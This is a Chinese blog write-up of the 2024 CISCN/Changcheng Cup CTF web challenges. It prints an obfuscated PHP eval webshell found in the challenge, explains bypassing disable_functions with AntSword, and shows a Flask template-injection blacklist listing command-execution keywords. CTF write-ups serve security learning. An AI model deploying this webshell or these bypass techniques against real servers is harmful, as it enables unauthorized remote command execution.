2024CISCN暨长城杯初赛WP——WEB方向

最新推荐文章于 2025-09-15 10:35:41 发布
原创 最新推荐文章于 2025-09-15 10:35:41 发布 · 1.5k 阅读 · 13 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#网络安全 #web #后端 #python
该文章已生成可运行项目,

2024CISCN暨长城杯初赛个人题解

hello_web

进入题目后F12打开控制台,可以得到两个文件,分别是hackme.php和tips.php,尝试用file参数进行读取,直接读取和php伪协议读取都无法读到,多次尝试后发现可以使用双写绕过读取。

传入file=…/./tips.php得到了phpinfo,可以看到 disable_functions 中过滤了许多函数

可以推测是disable_functions绕过,然后传入file=…/./hackme.php查看hackme.php文件,得到php代码如下

<?php
highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
?>

将这段代码反混淆后可以得到一个密码是cmd[66.99的木马文件,用蚁剑直接连接执行命令会得到ret=127,确定了是disable_functions的绕过使用绕过disable_functions插件,使用UserFilter模式直接获取可执行命令的shell,搜索flag然后cat即可

Safe_Proxy

进入题目后可以得到源码,将代码复制到本地后修改如下代码,将其从无回显的改成有回显的

@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # 安全过滤
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return result

然后在本地启动服务,用fenjing直接获取可以命令执行的payload,但由于原题无回显,反弹shell也失败,故使用>>将命令执行返回的结果输出到app.py中,最终payload如下

然后返回根目录,拉到最底下即可得到flag

本文章已经生成可运行项目
konpure
关注
第一届长城杯初赛部分wp(个人解题思路)
qq_74806534的博客
04-05 3770
访问蚁剑连接访问/var/www/html/u_c4nt_f1nd_flag.php。
CISCN初赛wp misc,re,pwn,web,crypto
fivesheeptree的博客
05-20 1784
CISCN初赛wp misc,re,pwn,web,crypto
2023长城杯 web部分题目(seeking&easy_extension)
weixin_63231007的博客
09-13 2168
2023 京津冀网络安全比赛 web部分wp
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1885
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
2024长城杯-第五场-流量分析wp
qq_67760645的博客
04-11 2694
查看了一下流量包里的协议包,发现只有TLS协议进行了加密。使用冰蝎4.0自带的解密脚本进行解密,协议名称那里根据前面发现的代码判断出是xor+base64。先把这段数据放入冰蝎进行解密,然后把这个cmd变量的这段base64进行解码,发现将这段串数字输入到文件中,文件名带有passwd。得到了flag{Keep_going_jpg},但是这个flag是错误的。但是这个flag里面的内容就是图片的文件名+文件后缀。说明解题还是看这个图片。查看那个key文件,拖入十六进制查看工具发现这个是RSA加密的key。
2024-CISCN-长城杯铁人三项 初赛
Aluxian_的博客
12-16 1837
【代码】2024-CISCN-长城杯铁人三项 初赛
2025第五届长城杯网络安全大赛初赛 Web方向 WP
最新发布
WayneJH的博客
09-15 4130
第五届“长城杯网络安全大赛京津冀蒙网络安全技能竞赛初赛 Web方向 题解WP
第一届“长城杯”信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 2236
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 1375
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
第四届长城杯部分wp
weixin_74427106的博客
09-09 2049
还是太菜了,要经常练了。
2024i春秋第四届长城杯网络安全大赛京津冀网络安全技能竞赛初赛wp-flowershop+easyre
书山有路勤为径,学海无涯苦作舟
09-10 1260
如图所示,v8是钱的数量,strncpy从src复制三个字符给dest的数组里,最后一个元素是0,相当于字符串截断,strcmp是比较c和dest中的内容,如果相等就不会exit(0);此时末位有个read,很可能就是我们要溢出的漏洞,但是参数v4可控未知,所以往前可看check函数做了什么,显然通过分析这就是满足买了两件a商品和1件b商品的时候就可以给a2指针赋值为70,指向的就是v4,这样shop函数的buf只有10字节,但是read可以输入70字节,就达到了溢出攻击条件。
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp
m0_74426634的博客
04-02 2516
第一届“长城杯”信息安全铁人三项赛初赛(第三赛区)部分题目wp(会持续更新)
2024-长城杯-wp
m0_73889365的博客
02-18 1310
CTF 比赛wp
第一届长城杯 部分WP
mumuzi的博客
09-19 3086
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
第一届长城杯半决赛wp和AWD笔记
qq_74806534的博客
04-25 4443
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
2024长城杯“-HTTPAttackFlow流量分析题(附题目)
xiaochaochao122的博客
04-01 1457
pwd=wkur。
CISCN2024 初赛 wp 部分复现(Re)
Pisces50002的博客
06-10 2100
成功率比较玄学,有的版本就不行,我用nexus5x真机也是会崩溃,这里是雷电9.0模拟的OPPO 9。字符串收集信息,可以猜测是利用seed生成randint、random之类的随机数进行了处理。密文长度是56,base64是3->4,转回来flag是42个字符(猜测)借助GPT对几个关键函数进行分析,忽略一些异常处理,看一下主要的逻辑。输入的内容base64编码之后,与通过randint生成的随机数异或。首先是unidbg的环境配置,这个特别麻烦,建议使用。讲的蛮好的,就是挺麻烦,基本功要求高。
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1561
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
第五届“长城杯初赛 2025 Web WP
qq_75192794的博客
09-14 4233
摘要:本文记录了多个CTF解题过程,包括文件上传、目录穿越、符号链接利用等技巧。1. 通过调试模式获取flag;2. 利用tar解压符号链接特性实现文件位置修改,上传webshell;3. PHP文件读取到RCE的CVE-2024-2961漏洞利用,包括下载exp脚本、修改参数实现命令执行。每个题目都详细说明了操作步骤和关键点,展示了从信息收集到最终获取flag的完整过程,涉及多种安全漏洞的实战利用技巧。
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2600
2022 CISCN 初赛pwn的完整wp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值